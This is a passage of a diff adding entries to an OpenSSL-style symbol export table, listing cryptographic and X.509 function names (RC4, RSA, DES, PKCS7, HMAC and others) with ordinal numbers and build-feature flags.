+RC2_encrypt                             474	EXIST::FUNCTION:RC2
+RC2_ofb64_encrypt                       475	EXIST::FUNCTION:RC2
+RC2_set_key                             476	EXIST::FUNCTION:RC2
+RC4                                     477	EXIST::FUNCTION:RC4
+RC4_options                             478	EXIST::FUNCTION:RC4
+RC4_set_key                             479	EXIST::FUNCTION:RC4
+RSAPrivateKey_asn1_meth                 480	NOEXIST::FUNCTION:
+RSAPrivateKey_dup                       481	EXIST::FUNCTION:RSA
+RSAPublicKey_dup                        482	EXIST::FUNCTION:RSA
+RSA_PKCS1_SSLeay                        483	EXIST::FUNCTION:RSA
+RSA_free                                484	EXIST::FUNCTION:RSA
+RSA_generate_key                        485	EXIST::FUNCTION:DEPRECATED,RSA
+RSA_new                                 486	EXIST::FUNCTION:RSA
+RSA_new_method                          487	EXIST::FUNCTION:RSA
+RSA_print                               488	EXIST::FUNCTION:BIO,RSA
+RSA_print_fp                            489	EXIST::FUNCTION:FP_API,RSA
+RSA_private_decrypt                     490	EXIST::FUNCTION:RSA
+RSA_private_encrypt                     491	EXIST::FUNCTION:RSA
+RSA_public_decrypt                      492	EXIST::FUNCTION:RSA
+RSA_public_encrypt                      493	EXIST::FUNCTION:RSA
+RSA_set_default_method                  494	EXIST::FUNCTION:RSA
+RSA_sign                                495	EXIST::FUNCTION:RSA
+RSA_sign_ASN1_OCTET_STRING              496	EXIST::FUNCTION:RSA
+RSA_size                                497	EXIST::FUNCTION:RSA
+RSA_verify                              498	EXIST::FUNCTION:RSA
+RSA_verify_ASN1_OCTET_STRING            499	EXIST::FUNCTION:RSA
+SHA                                     500	EXIST::FUNCTION:SHA,SHA0
+SHA1                                    501	EXIST::FUNCTION:SHA,SHA1
+SHA1_Final                              502	EXIST::FUNCTION:SHA,SHA1
+SHA1_Init                               503	EXIST::FUNCTION:SHA,SHA1
+SHA1_Update                             504	EXIST::FUNCTION:SHA,SHA1
+SHA_Final                               505	EXIST::FUNCTION:SHA,SHA0
+SHA_Init                                506	EXIST::FUNCTION:SHA,SHA0
+SHA_Update                              507	EXIST::FUNCTION:SHA,SHA0
+OpenSSL_add_all_algorithms              508	NOEXIST::FUNCTION:
+OpenSSL_add_all_ciphers                 509	EXIST::FUNCTION:
+OpenSSL_add_all_digests                 510	EXIST::FUNCTION:
+TXT_DB_create_index                     511	EXIST::FUNCTION:
+TXT_DB_free                             512	EXIST::FUNCTION:
+TXT_DB_get_by_index                     513	EXIST::FUNCTION:
+TXT_DB_insert                           514	EXIST::FUNCTION:
+TXT_DB_read                             515	EXIST::FUNCTION:BIO
+TXT_DB_write                            516	EXIST::FUNCTION:BIO
+X509_ALGOR_free                         517	EXIST::FUNCTION:
+X509_ALGOR_new                          518	EXIST::FUNCTION:
+X509_ATTRIBUTE_free                     519	EXIST::FUNCTION:
+X509_ATTRIBUTE_new                      520	EXIST::FUNCTION:
+X509_CINF_free                          521	EXIST::FUNCTION:
+X509_CINF_new                           522	EXIST::FUNCTION:
+X509_CRL_INFO_free                      523	EXIST::FUNCTION:
+X509_CRL_INFO_new                       524	EXIST::FUNCTION:
+X509_CRL_add_ext                        525	EXIST::FUNCTION:
+X509_CRL_cmp                            526	EXIST::FUNCTION:
+X509_CRL_delete_ext                     527	EXIST::FUNCTION:
+X509_CRL_dup                            528	EXIST::FUNCTION:
+X509_CRL_free                           529	EXIST::FUNCTION:
+X509_CRL_get_ext                        530	EXIST::FUNCTION:
+X509_CRL_get_ext_by_NID                 531	EXIST::FUNCTION:
+X509_CRL_get_ext_by_OBJ                 532	EXIST::FUNCTION:
+X509_CRL_get_ext_by_critical            533	EXIST::FUNCTION:
+X509_CRL_get_ext_count                  534	EXIST::FUNCTION:
+X509_CRL_new                            535	EXIST::FUNCTION:
+X509_CRL_sign                           536	EXIST::FUNCTION:EVP
+X509_CRL_verify                         537	EXIST::FUNCTION:EVP
+X509_EXTENSION_create_by_NID            538	EXIST::FUNCTION:
+X509_EXTENSION_create_by_OBJ            539	EXIST::FUNCTION:
+X509_EXTENSION_dup                      540	EXIST::FUNCTION:
+X509_EXTENSION_free                     541	EXIST::FUNCTION:
+X509_EXTENSION_get_critical             542	EXIST::FUNCTION:
+X509_EXTENSION_get_data                 543	EXIST::FUNCTION:
+X509_EXTENSION_get_object               544	EXIST::FUNCTION:
+X509_EXTENSION_new                      545	EXIST::FUNCTION:
+X509_EXTENSION_set_critical             546	EXIST::FUNCTION:
+X509_EXTENSION_set_data                 547	EXIST::FUNCTION:
+X509_EXTENSION_set_object               548	EXIST::FUNCTION:
+X509_INFO_free                          549	EXIST::FUNCTION:EVP
+X509_INFO_new                           550	EXIST::FUNCTION:EVP
+X509_LOOKUP_by_alias                    551	EXIST::FUNCTION:
+X509_LOOKUP_by_fingerprint              552	EXIST::FUNCTION:
+X509_LOOKUP_by_issuer_serial            553	EXIST::FUNCTION:
+X509_LOOKUP_by_subject                  554	EXIST::FUNCTION:
+X509_LOOKUP_ctrl                        555	EXIST::FUNCTION:
+X509_LOOKUP_file                        556	EXIST::FUNCTION:
+X509_LOOKUP_free                        557	EXIST::FUNCTION:
+X509_LOOKUP_hash_dir                    558	EXIST::FUNCTION:
+X509_LOOKUP_init                        559	EXIST::FUNCTION:
+X509_LOOKUP_new                         560	EXIST::FUNCTION:
+X509_LOOKUP_shutdown                    561	EXIST::FUNCTION:
+X509_NAME_ENTRY_create_by_NID           562	EXIST::FUNCTION:
+X509_NAME_ENTRY_create_by_OBJ           563	EXIST::FUNCTION:
+X509_NAME_ENTRY_dup                     564	EXIST::FUNCTION:
+X509_NAME_ENTRY_free                    565	EXIST::FUNCTION:
+X509_NAME_ENTRY_get_data                566	EXIST::FUNCTION:
+X509_NAME_ENTRY_get_object              567	EXIST::FUNCTION:
+X509_NAME_ENTRY_new                     568	EXIST::FUNCTION:
+X509_NAME_ENTRY_set_data                569	EXIST::FUNCTION:
+X509_NAME_ENTRY_set_object              570	EXIST::FUNCTION:
+X509_NAME_add_entry                     571	EXIST::FUNCTION:
+X509_NAME_cmp                           572	EXIST::FUNCTION:
+X509_NAME_delete_entry                  573	EXIST::FUNCTION:
+X509_NAME_digest                        574	EXIST::FUNCTION:EVP
+X509_NAME_dup                           575	EXIST::FUNCTION:
+X509_NAME_entry_count                   576	EXIST::FUNCTION:
+X509_NAME_free                          577	EXIST::FUNCTION:
+X509_NAME_get_entry                     578	EXIST::FUNCTION:
+X509_NAME_get_index_by_NID              579	EXIST::FUNCTION:
+X509_NAME_get_index_by_OBJ              580	EXIST::FUNCTION:
+X509_NAME_get_text_by_NID               581	EXIST::FUNCTION:
+X509_NAME_get_text_by_OBJ               582	EXIST::FUNCTION:
+X509_NAME_hash                          583	EXIST::FUNCTION:
+X509_NAME_new                           584	EXIST::FUNCTION:
+X509_NAME_oneline                       585	EXIST::FUNCTION:EVP
+X509_NAME_print                         586	EXIST::FUNCTION:BIO
+X509_NAME_set                           587	EXIST::FUNCTION:
+X509_OBJECT_free_contents               588	EXIST::FUNCTION:
+X509_OBJECT_retrieve_by_subject         589	EXIST::FUNCTION:
+X509_OBJECT_up_ref_count                590	EXIST::FUNCTION:
+X509_PKEY_free                          591	EXIST::FUNCTION:
+X509_PKEY_new                           592	EXIST::FUNCTION:
+X509_PUBKEY_free                        593	EXIST::FUNCTION:
+X509_PUBKEY_get                         594	EXIST::FUNCTION:
+X509_PUBKEY_new                         595	EXIST::FUNCTION:
+X509_PUBKEY_set                         596	EXIST::FUNCTION:
+X509_REQ_INFO_free                      597	EXIST::FUNCTION:
+X509_REQ_INFO_new                       598	EXIST::FUNCTION:
+X509_REQ_dup                            599	EXIST::FUNCTION:
+X509_REQ_free                           600	EXIST::FUNCTION:
+X509_REQ_get_pubkey                     601	EXIST::FUNCTION:
+X509_REQ_new                            602	EXIST::FUNCTION:
+X509_REQ_print                          603	EXIST::FUNCTION:BIO
+X509_REQ_print_fp                       604	EXIST::FUNCTION:FP_API
+X509_REQ_set_pubkey                     605	EXIST::FUNCTION:
+X509_REQ_set_subject_name               606	EXIST::FUNCTION:
+X509_REQ_set_version                    607	EXIST::FUNCTION:
+X509_REQ_sign                           608	EXIST::FUNCTION:EVP
+X509_REQ_to_X509                        609	EXIST::FUNCTION:
+X509_REQ_verify                         610	EXIST::FUNCTION:EVP
+X509_REVOKED_add_ext                    611	EXIST::FUNCTION:
+X509_REVOKED_delete_ext                 612	EXIST::FUNCTION:
+X509_REVOKED_free                       613	EXIST::FUNCTION:
+X509_REVOKED_get_ext                    614	EXIST::FUNCTION:
+X509_REVOKED_get_ext_by_NID             615	EXIST::FUNCTION:
+X509_REVOKED_get_ext_by_OBJ             616	EXIST::FUNCTION:
+X509_REVOKED_get_ext_by_critical        617	EXIST:!VMS:FUNCTION:
+X509_REVOKED_get_ext_by_critic          617	EXIST:VMS:FUNCTION:
+X509_REVOKED_get_ext_count              618	EXIST::FUNCTION:
+X509_REVOKED_new                        619	EXIST::FUNCTION:
+X509_SIG_free                           620	EXIST::FUNCTION:
+X509_SIG_new                            621	EXIST::FUNCTION:
+X509_STORE_CTX_cleanup                  622	EXIST::FUNCTION:
+X509_STORE_CTX_init                     623	EXIST::FUNCTION:
+X509_STORE_add_cert                     624	EXIST::FUNCTION:
+X509_STORE_add_lookup                   625	EXIST::FUNCTION:
+X509_STORE_free                         626	EXIST::FUNCTION:
+X509_STORE_get_by_subject               627	EXIST::FUNCTION:
+X509_STORE_load_locations               628	EXIST::FUNCTION:STDIO
+X509_STORE_new                          629	EXIST::FUNCTION:
+X509_STORE_set_default_paths            630	EXIST::FUNCTION:STDIO
+X509_VAL_free                           631	EXIST::FUNCTION:
+X509_VAL_new                            632	EXIST::FUNCTION:
+X509_add_ext                            633	EXIST::FUNCTION:
+X509_asn1_meth                          634	NOEXIST::FUNCTION:
+X509_certificate_type                   635	EXIST::FUNCTION:
+X509_check_private_key                  636	EXIST::FUNCTION:
+X509_cmp_current_time                   637	EXIST::FUNCTION:
+X509_delete_ext                         638	EXIST::FUNCTION:
+X509_digest                             639	EXIST::FUNCTION:EVP
+X509_dup                                640	EXIST::FUNCTION:
+X509_free                               641	EXIST::FUNCTION:
+X509_get_default_cert_area              642	EXIST::FUNCTION:
+X509_get_default_cert_dir               643	EXIST::FUNCTION:
+X509_get_default_cert_dir_env           644	EXIST::FUNCTION:
+X509_get_default_cert_file              645	EXIST::FUNCTION:
+X509_get_default_cert_file_env          646	EXIST::FUNCTION:
+X509_get_default_private_dir            647	EXIST::FUNCTION:
+X509_get_ext                            648	EXIST::FUNCTION:
+X509_get_ext_by_NID                     649	EXIST::FUNCTION:
+X509_get_ext_by_OBJ                     650	EXIST::FUNCTION:
+X509_get_ext_by_critical                651	EXIST::FUNCTION:
+X509_get_ext_count                      652	EXIST::FUNCTION:
+X509_get_issuer_name                    653	EXIST::FUNCTION:
+X509_get_pubkey                         654	EXIST::FUNCTION:
+X509_get_pubkey_parameters              655	EXIST::FUNCTION:
+X509_get_serialNumber                   656	EXIST::FUNCTION:
+X509_get_subject_name                   657	EXIST::FUNCTION:
+X509_gmtime_adj                         658	EXIST::FUNCTION:
+X509_issuer_and_serial_cmp              659	EXIST::FUNCTION:
+X509_issuer_and_serial_hash             660	EXIST::FUNCTION:
+X509_issuer_name_cmp                    661	EXIST::FUNCTION:
+X509_issuer_name_hash                   662	EXIST::FUNCTION:
+X509_load_cert_file                     663	EXIST::FUNCTION:STDIO
+X509_new                                664	EXIST::FUNCTION:
+X509_print                              665	EXIST::FUNCTION:BIO
+X509_print_fp                           666	EXIST::FUNCTION:FP_API
+X509_set_issuer_name                    667	EXIST::FUNCTION:
+X509_set_notAfter                       668	EXIST::FUNCTION:
+X509_set_notBefore                      669	EXIST::FUNCTION:
+X509_set_pubkey                         670	EXIST::FUNCTION:
+X509_set_serialNumber                   671	EXIST::FUNCTION:
+X509_set_subject_name                   672	EXIST::FUNCTION:
+X509_set_version                        673	EXIST::FUNCTION:
+X509_sign                               674	EXIST::FUNCTION:EVP
+X509_subject_name_cmp                   675	EXIST::FUNCTION:
+X509_subject_name_hash                  676	EXIST::FUNCTION:
+X509_to_X509_REQ                        677	EXIST::FUNCTION:
+X509_verify                             678	EXIST::FUNCTION:EVP
+X509_verify_cert                        679	EXIST::FUNCTION:
+X509_verify_cert_error_string           680	EXIST::FUNCTION:
+X509v3_add_ext                          681	EXIST::FUNCTION:
+X509v3_add_extension                    682	NOEXIST::FUNCTION:
+X509v3_add_netscape_extensions          683	NOEXIST::FUNCTION:
+X509v3_add_standard_extensions          684	NOEXIST::FUNCTION:
+X509v3_cleanup_extensions               685	NOEXIST::FUNCTION:
+X509v3_data_type_by_NID                 686	NOEXIST::FUNCTION:
+X509v3_data_type_by_OBJ                 687	NOEXIST::FUNCTION:
+X509v3_delete_ext                       688	EXIST::FUNCTION:
+X509v3_get_ext                          689	EXIST::FUNCTION:
+X509v3_get_ext_by_NID                   690	EXIST::FUNCTION:
+X509v3_get_ext_by_OBJ                   691	EXIST::FUNCTION:
+X509v3_get_ext_by_critical              692	EXIST::FUNCTION:
+X509v3_get_ext_count                    693	EXIST::FUNCTION:
+X509v3_pack_string                      694	NOEXIST::FUNCTION:
+X509v3_pack_type_by_NID                 695	NOEXIST::FUNCTION:
+X509v3_pack_type_by_OBJ                 696	NOEXIST::FUNCTION:
+X509v3_unpack_string                    697	NOEXIST::FUNCTION:
+_des_crypt                              698	NOEXIST::FUNCTION:
+a2d_ASN1_OBJECT                         699	EXIST::FUNCTION:
+a2i_ASN1_INTEGER                        700	EXIST::FUNCTION:BIO
+a2i_ASN1_STRING                         701	EXIST::FUNCTION:BIO
+asn1_Finish                             702	EXIST::FUNCTION:
+asn1_GetSequence                        703	EXIST::FUNCTION:
+bn_div_words                            704	EXIST::FUNCTION:
+bn_expand2                              705	EXIST::FUNCTION:
+bn_mul_add_words                        706	EXIST::FUNCTION:
+bn_mul_words                            707	EXIST::FUNCTION:
+BN_uadd                                 708	EXIST::FUNCTION:
+BN_usub                                 709	EXIST::FUNCTION:
+bn_sqr_words                            710	EXIST::FUNCTION:
+_ossl_old_crypt                         711	EXIST:!NeXT,!PERL5:FUNCTION:DES
+d2i_ASN1_BIT_STRING                     712	EXIST::FUNCTION:
+d2i_ASN1_BOOLEAN                        713	EXIST::FUNCTION:
+d2i_ASN1_HEADER                         714	NOEXIST::FUNCTION:
+d2i_ASN1_IA5STRING                      715	EXIST::FUNCTION:
+d2i_ASN1_INTEGER                        716	EXIST::FUNCTION:
+d2i_ASN1_OBJECT                         717	EXIST::FUNCTION:
+d2i_ASN1_OCTET_STRING                   718	EXIST::FUNCTION:
+d2i_ASN1_PRINTABLE                      719	EXIST::FUNCTION:
+d2i_ASN1_PRINTABLESTRING                720	EXIST::FUNCTION:
+d2i_ASN1_SET                            721	EXIST::FUNCTION:
+d2i_ASN1_T61STRING                      722	EXIST::FUNCTION:
+d2i_ASN1_TYPE                           723	EXIST::FUNCTION:
+d2i_ASN1_UTCTIME                        724	EXIST::FUNCTION:
+d2i_ASN1_bytes                          725	EXIST::FUNCTION:
+d2i_ASN1_type_bytes                     726	EXIST::FUNCTION:
+d2i_DHparams                            727	EXIST::FUNCTION:DH
+d2i_DSAPrivateKey                       728	EXIST::FUNCTION:DSA
+d2i_DSAPrivateKey_bio                   729	EXIST::FUNCTION:BIO,DSA
+d2i_DSAPrivateKey_fp                    730	EXIST::FUNCTION:DSA,FP_API
+d2i_DSAPublicKey                        731	EXIST::FUNCTION:DSA
+d2i_DSAparams                           732	EXIST::FUNCTION:DSA
+d2i_NETSCAPE_SPKAC                      733	EXIST::FUNCTION:
+d2i_NETSCAPE_SPKI                       734	EXIST::FUNCTION:
+d2i_Netscape_RSA                        735	EXIST::FUNCTION:RC4,RSA
+d2i_PKCS7                               736	EXIST::FUNCTION:
+d2i_PKCS7_DIGEST                        737	EXIST::FUNCTION:
+d2i_PKCS7_ENCRYPT                       738	EXIST::FUNCTION:
+d2i_PKCS7_ENC_CONTENT                   739	EXIST::FUNCTION:
+d2i_PKCS7_ENVELOPE                      740	EXIST::FUNCTION:
+d2i_PKCS7_ISSUER_AND_SERIAL             741	EXIST::FUNCTION:
+d2i_PKCS7_RECIP_INFO                    742	EXIST::FUNCTION:
+d2i_PKCS7_SIGNED                        743	EXIST::FUNCTION:
+d2i_PKCS7_SIGNER_INFO                   744	EXIST::FUNCTION:
+d2i_PKCS7_SIGN_ENVELOPE                 745	EXIST::FUNCTION:
+d2i_PKCS7_bio                           746	EXIST::FUNCTION:
+d2i_PKCS7_fp                            747	EXIST::FUNCTION:FP_API
+d2i_PrivateKey                          748	EXIST::FUNCTION:
+d2i_PublicKey                           749	EXIST::FUNCTION:
+d2i_RSAPrivateKey                       750	EXIST::FUNCTION:RSA
+d2i_RSAPrivateKey_bio                   751	EXIST::FUNCTION:BIO,RSA
+d2i_RSAPrivateKey_fp                    752	EXIST::FUNCTION:FP_API,RSA
+d2i_RSAPublicKey                        753	EXIST::FUNCTION:RSA
+d2i_X509                                754	EXIST::FUNCTION:
+d2i_X509_ALGOR                          755	EXIST::FUNCTION:
+d2i_X509_ATTRIBUTE                      756	EXIST::FUNCTION:
+d2i_X509_CINF                           757	EXIST::FUNCTION:
+d2i_X509_CRL                            758	EXIST::FUNCTION:
+d2i_X509_CRL_INFO                       759	EXIST::FUNCTION:
+d2i_X509_CRL_bio                        760	EXIST::FUNCTION:BIO
+d2i_X509_CRL_fp                         761	EXIST::FUNCTION:FP_API
+d2i_X509_EXTENSION                      762	EXIST::FUNCTION:
+d2i_X509_NAME                           763	EXIST::FUNCTION:
+d2i_X509_NAME_ENTRY                     764	EXIST::FUNCTION:
+d2i_X509_PKEY                           765	EXIST::FUNCTION:
+d2i_X509_PUBKEY                         766	EXIST::FUNCTION:
+d2i_X509_REQ                            767	EXIST::FUNCTION:
+d2i_X509_REQ_INFO                       768	EXIST::FUNCTION:
+d2i_X509_REQ_bio                        769	EXIST::FUNCTION:BIO
+d2i_X509_REQ_fp                         770	EXIST::FUNCTION:FP_API
+d2i_X509_REVOKED                        771	EXIST::FUNCTION:
+d2i_X509_SIG                            772	EXIST::FUNCTION:
+d2i_X509_VAL                            773	EXIST::FUNCTION:
+d2i_X509_bio                            774	EXIST::FUNCTION:BIO
+d2i_X509_fp                             775	EXIST::FUNCTION:FP_API
+DES_cbc_cksum                           777	EXIST::FUNCTION:DES
+DES_cbc_encrypt                         778	EXIST::FUNCTION:DES
+DES_cblock_print_file                   779	NOEXIST::FUNCTION:
+DES_cfb64_encrypt                       780	EXIST::FUNCTION:DES
+DES_cfb_encrypt                         781	EXIST::FUNCTION:DES
+DES_decrypt3                            782	EXIST::FUNCTION:DES
+DES_ecb3_encrypt                        783	EXIST::FUNCTION:DES
+DES_ecb_encrypt                         784	EXIST::FUNCTION:DES
+DES_ede3_cbc_encrypt                    785	EXIST::FUNCTION:DES
+DES_ede3_cfb64_encrypt                  786	EXIST::FUNCTION:DES
+DES_ede3_ofb64_encrypt                  787	EXIST::FUNCTION:DES
+DES_enc_read                            788	EXIST::FUNCTION:DES
+DES_enc_write                           789	EXIST::FUNCTION:DES
+DES_encrypt1                            790	EXIST::FUNCTION:DES
+DES_encrypt2                            791	EXIST::FUNCTION:DES
+DES_encrypt3                            792	EXIST::FUNCTION:DES
+DES_fcrypt                              793	EXIST::FUNCTION:DES
+DES_is_weak_key                         794	EXIST::FUNCTION:DES
+DES_key_sched                           795	EXIST::FUNCTION:DES
+DES_ncbc_encrypt                        796	EXIST::FUNCTION:DES
+DES_ofb64_encrypt                       797	EXIST::FUNCTION:DES
+DES_ofb_encrypt                         798	EXIST::FUNCTION:DES
+DES_options                             799	EXIST::FUNCTION:DES
+DES_pcbc_encrypt                        800	EXIST::FUNCTION:DES
+DES_quad_cksum                          801	EXIST::FUNCTION:DES
+DES_random_key                          802	EXIST::FUNCTION:DES
+_ossl_old_des_random_seed               803	EXIST::FUNCTION:DES
+_ossl_old_des_read_2passwords           804	EXIST::FUNCTION:DES
+_ossl_old_des_read_password             805	EXIST::FUNCTION:DES
+_ossl_old_des_read_pw                   806	EXIST::FUNCTION:
+_ossl_old_des_read_pw_string            807	EXIST::FUNCTION:
+DES_set_key                             808	EXIST::FUNCTION:DES
+DES_set_odd_parity                      809	EXIST::FUNCTION:DES
+DES_string_to_2keys                     810	EXIST::FUNCTION:DES
+DES_string_to_key                       811	EXIST::FUNCTION:DES
+DES_xcbc_encrypt                        812	EXIST::FUNCTION:DES
+DES_xwhite_in2out                       813	NOEXIST::FUNCTION:
+fcrypt_body                             814	NOEXIST::FUNCTION:
+i2a_ASN1_INTEGER                        815	EXIST::FUNCTION:BIO
+i2a_ASN1_OBJECT                         816	EXIST::FUNCTION:BIO
+i2a_ASN1_STRING                         817	EXIST::FUNCTION:BIO
+i2d_ASN1_BIT_STRING                     818	EXIST::FUNCTION:
+i2d_ASN1_BOOLEAN                        819	EXIST::FUNCTION:
+i2d_ASN1_HEADER                         820	NOEXIST::FUNCTION:
+i2d_ASN1_IA5STRING                      821	EXIST::FUNCTION:
+i2d_ASN1_INTEGER                        822	EXIST::FUNCTION:
+i2d_ASN1_OBJECT                         823	EXIST::FUNCTION:
+i2d_ASN1_OCTET_STRING                   824	EXIST::FUNCTION:
+i2d_ASN1_PRINTABLE                      825	EXIST::FUNCTION:
+i2d_ASN1_SET                            826	EXIST::FUNCTION:
+i2d_ASN1_TYPE                           827	EXIST::FUNCTION:
+i2d_ASN1_UTCTIME                        828	EXIST::FUNCTION:
+i2d_ASN1_bytes                          829	EXIST::FUNCTION:
+i2d_DHparams                            830	EXIST::FUNCTION:DH
+i2d_DSAPrivateKey                       831	EXIST::FUNCTION:DSA
+i2d_DSAPrivateKey_bio                   832	EXIST::FUNCTION:BIO,DSA
+i2d_DSAPrivateKey_fp                    833	EXIST::FUNCTION:DSA,FP_API
+i2d_DSAPublicKey                        834	EXIST::FUNCTION:DSA
+i2d_DSAparams                           835	EXIST::FUNCTION:DSA
+i2d_NETSCAPE_SPKAC                      836	EXIST::FUNCTION:
+i2d_NETSCAPE_SPKI                       837	EXIST::FUNCTION:
+i2d_Netscape_RSA                        838	EXIST::FUNCTION:RC4,RSA
+i2d_PKCS7                               839	EXIST::FUNCTION:
+i2d_PKCS7_DIGEST                        840	EXIST::FUNCTION:
+i2d_PKCS7_ENCRYPT                       841	EXIST::FUNCTION:
+i2d_PKCS7_ENC_CONTENT                   842	EXIST::FUNCTION:
+i2d_PKCS7_ENVELOPE                      843	EXIST::FUNCTION:
+i2d_PKCS7_ISSUER_AND_SERIAL             844	EXIST::FUNCTION:
+i2d_PKCS7_RECIP_INFO                    845	EXIST::FUNCTION:
+i2d_PKCS7_SIGNED                        846	EXIST::FUNCTION:
+i2d_PKCS7_SIGNER_INFO                   847	EXIST::FUNCTION:
+i2d_PKCS7_SIGN_ENVELOPE                 848	EXIST::FUNCTION:
+i2d_PKCS7_bio                           849	EXIST::FUNCTION:
+i2d_PKCS7_fp                            850	EXIST::FUNCTION:FP_API
+i2d_PrivateKey                          851	EXIST::FUNCTION:
+i2d_PublicKey                           852	EXIST::FUNCTION:
+i2d_RSAPrivateKey                       853	EXIST::FUNCTION:RSA
+i2d_RSAPrivateKey_bio                   854	EXIST::FUNCTION:BIO,RSA
+i2d_RSAPrivateKey_fp                    855	EXIST::FUNCTION:FP_API,RSA
+i2d_RSAPublicKey                        856	EXIST::FUNCTION:RSA
+i2d_X509                                857	EXIST::FUNCTION:
+i2d_X509_ALGOR                          858	EXIST::FUNCTION:
+i2d_X509_ATTRIBUTE                      859	EXIST::FUNCTION:
+i2d_X509_CINF                           860	EXIST::FUNCTION:
+i2d_X509_CRL                            861	EXIST::FUNCTION:
+i2d_X509_CRL_INFO                       862	EXIST::FUNCTION:
+i2d_X509_CRL_bio                        863	EXIST::FUNCTION:BIO
+i2d_X509_CRL_fp                         864	EXIST::FUNCTION:FP_API
+i2d_X509_EXTENSION                      865	EXIST::FUNCTION:
+i2d_X509_NAME                           866	EXIST::FUNCTION:
+i2d_X509_NAME_ENTRY                     867	EXIST::FUNCTION:
+i2d_X509_PKEY                           868	EXIST::FUNCTION:
+i2d_X509_PUBKEY                         869	EXIST::FUNCTION:
+i2d_X509_REQ                            870	EXIST::FUNCTION:
+i2d_X509_REQ_INFO                       871	EXIST::FUNCTION:
+i2d_X509_REQ_bio                        872	EXIST::FUNCTION:BIO
+i2d_X509_REQ_fp                         873	EXIST::FUNCTION:FP_API
+i2d_X509_REVOKED                        874	EXIST::FUNCTION:
+i2d_X509_SIG                            875	EXIST::FUNCTION:
+i2d_X509_VAL                            876	EXIST::FUNCTION:
+i2d_X509_bio                            877	EXIST::FUNCTION:BIO
+i2d_X509_fp                             878	EXIST::FUNCTION:FP_API
+idea_cbc_encrypt                        879	EXIST::FUNCTION:IDEA
+idea_cfb64_encrypt                      880	EXIST::FUNCTION:IDEA
+idea_ecb_encrypt                        881	EXIST::FUNCTION:IDEA
+idea_encrypt                            882	EXIST::FUNCTION:IDEA
+idea_ofb64_encrypt                      883	EXIST::FUNCTION:IDEA
+idea_options                            884	EXIST::FUNCTION:IDEA
+idea_set_decrypt_key                    885	EXIST::FUNCTION:IDEA
+idea_set_encrypt_key                    886	EXIST::FUNCTION:IDEA
+lh_delete                               887	EXIST::FUNCTION:
+lh_doall                                888	EXIST::FUNCTION:
+lh_doall_arg                            889	EXIST::FUNCTION:
+lh_free                                 890	EXIST::FUNCTION:
+lh_insert                               891	EXIST::FUNCTION:
+lh_new                                  892	EXIST::FUNCTION:
+lh_node_stats                           893	EXIST::FUNCTION:FP_API
+lh_node_stats_bio                       894	EXIST::FUNCTION:BIO
+lh_node_usage_stats                     895	EXIST::FUNCTION:FP_API
+lh_node_usage_stats_bio                 896	EXIST::FUNCTION:BIO
+lh_retrieve                             897	EXIST::FUNCTION:
+lh_stats                                898	EXIST::FUNCTION:FP_API
+lh_stats_bio                            899	EXIST::FUNCTION:BIO
+lh_strhash                              900	EXIST::FUNCTION:
+sk_delete                               901	EXIST::FUNCTION:
+sk_delete_ptr                           902	EXIST::FUNCTION:
+sk_dup                                  903	EXIST::FUNCTION:
+sk_find                                 904	EXIST::FUNCTION:
+sk_free                                 905	EXIST::FUNCTION:
+sk_insert                               906	EXIST::FUNCTION:
+sk_new                                  907	EXIST::FUNCTION:
+sk_pop                                  908	EXIST::FUNCTION:
+sk_pop_free                             909	EXIST::FUNCTION:
+sk_push                                 910	EXIST::FUNCTION:
+sk_set_cmp_func                         911	EXIST::FUNCTION:
+sk_shift                                912	EXIST::FUNCTION:
+sk_unshift                              913	EXIST::FUNCTION:
+sk_zero                                 914	EXIST::FUNCTION:
+BIO_f_nbio_test                         915	EXIST::FUNCTION:
+ASN1_TYPE_get                           916	EXIST::FUNCTION:
+ASN1_TYPE_set                           917	EXIST::FUNCTION:
+PKCS7_content_free                      918	NOEXIST::FUNCTION:
+ERR_load_PKCS7_strings                  919	EXIST::FUNCTION:
+X509_find_by_issuer_and_serial          920	EXIST::FUNCTION:
+X509_find_by_subject                    921	EXIST::FUNCTION:
+PKCS7_ctrl                              927	EXIST::FUNCTION:
+PKCS7_set_type                          928	EXIST::FUNCTION:
+PKCS7_set_content                       929	EXIST::FUNCTION:
+PKCS7_SIGNER_INFO_set                   930	EXIST::FUNCTION:
+PKCS7_add_signer                        931	EXIST::FUNCTION:
+PKCS7_add_certificate                   932	EXIST::FUNCTION:
+PKCS7_add_crl                           933	EXIST::FUNCTION:
+PKCS7_content_new                       934	EXIST::FUNCTION:
+PKCS7_dataSign                          935	NOEXIST::FUNCTION:
+PKCS7_dataVerify                        936	EXIST::FUNCTION:
+PKCS7_dataInit                          937	EXIST::FUNCTION:
+PKCS7_add_signature                     938	EXIST::FUNCTION:
+PKCS7_cert_from_signer_info             939	EXIST::FUNCTION:
+PKCS7_get_signer_info                   940	EXIST::FUNCTION:
+EVP_delete_alias                        941	NOEXIST::FUNCTION:
+EVP_mdc2                                942	EXIST::FUNCTION:MDC2
+PEM_read_bio_RSAPublicKey               943	EXIST::FUNCTION:RSA
+PEM_write_bio_RSAPublicKey              944	EXIST::FUNCTION:RSA
+d2i_RSAPublicKey_bio                    945	EXIST::FUNCTION:BIO,RSA
+i2d_RSAPublicKey_bio                    946	EXIST::FUNCTION:BIO,RSA
+PEM_read_RSAPublicKey                   947	EXIST:!WIN16:FUNCTION:RSA
+PEM_write_RSAPublicKey                  949	EXIST:!WIN16:FUNCTION:RSA
+d2i_RSAPublicKey_fp                     952	EXIST::FUNCTION:FP_API,RSA
+i2d_RSAPublicKey_fp                     954	EXIST::FUNCTION:FP_API,RSA
+BIO_copy_next_retry                     955	EXIST::FUNCTION:
+RSA_flags                               956	EXIST::FUNCTION:RSA
+X509_STORE_add_crl                      957	EXIST::FUNCTION:
+X509_load_crl_file                      958	EXIST::FUNCTION:STDIO
+EVP_rc2_40_cbc                          959	EXIST::FUNCTION:RC2
+EVP_rc4_40                              960	EXIST::FUNCTION:RC4
+EVP_CIPHER_CTX_init                     961	EXIST::FUNCTION:
+HMAC                                    962	EXIST::FUNCTION:HMAC
+HMAC_Init                               963	EXIST::FUNCTION:HMAC
+HMAC_Update                             964	EXIST::FUNCTION:HMAC
+HMAC_Final                              965	EXIST::FUNCTION:HMAC
+ERR_get_next_error_library              966	EXIST::FUNCTION:
+EVP_PKEY_cmp_parameters                 967	EXIST::FUNCTION:
+HMAC_cleanup                            968	NOEXIST::FUNCTION:
+BIO_ptr_ctrl                            969	EXIST::FUNCTION:
+BIO_new_file_internal                   970	NOEXIST::FUNCTION:
+BIO_new_fp_internal                     971	NOEXIST::FUNCTION:
+BIO_s_file_internal                     972	NOEXIST::FUNCTION:
+BN_BLINDING_convert                     973	EXIST::FUNCTION:
